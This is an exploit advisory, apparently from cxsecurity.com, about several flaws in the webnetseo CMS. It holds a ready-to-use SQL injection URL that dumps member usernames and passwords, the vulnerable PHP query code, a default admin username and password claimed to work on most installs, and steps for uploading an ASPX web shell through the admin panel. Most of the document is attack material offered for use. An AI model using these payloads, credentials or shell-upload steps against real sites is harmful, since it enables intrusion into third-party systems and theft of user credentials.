webnetseo CMS Multiple Vulnerabilities

Published
Credit
Risk
2017.05.07
Ashiyane Digital Security Team
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes

###########################################################
# Exploit Title : webnetseo CMS Multiple Vulnerabilities
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage: webnetseo.net
# Date : 2017 07 May
# Category : WebApp
# MY HOME : Ashiyane.org
# CWE : CWE-89 - CWE-276 And ...
# Video : https://www.youtube.com/watch?v=dZLDPYJeLSw
###########################################################
webnetseo CMS Multiple Vulnerabilities
1-SQL INJECTION
2-Default Account
3-Upload shell - ASPX
Research by Ashiyane Digital Security Team
###########################################################
1-SQL INJECTION
Some sql Vulnerability location
/picc.php?id=
Localhost://picc.php?id=-[inputSQL]+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from+member--+/
source Vulnerability
files : Picc.php
$id=$_GET["id"];
$id2=$_GET["id2"];
$id3=$_GET["id3"];
$strQuery = "SELECT * FROM pic where id > '$id' && class_id='$id3' order by id asc";
$db->query($strQuery);
if($db->next_record()){
echo '<a href="picc.php?id='.$db->f("id").'&id3='.f("class_id").'" style="font-size:12px; font-weight:normal; " >'.$db->f("title").'</a>';
}else{
echo "?";
}
?></td>
</tr>
###########################################################
2-Default Account
90% sites Default Account Default Account
USER : yxy746380
PASS : 746380
###########################################################
3-Upload shell - ASPX
go to TARGET.COM/admin/pic.php?id=2
upload ASPX And ASP shell
shell location : TARGET.COM/images/upload_file/[RandonName.aspx]
finishd
################################################
# Discovered By : Hassan Shakeri
# Twitter : @ShakeriHassan - Fb.com/General.BlackHat - Me@Seravo.ir
###########################################################

References:

https://www.youtube.com/watch?v=dZLDPYJeLSw


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com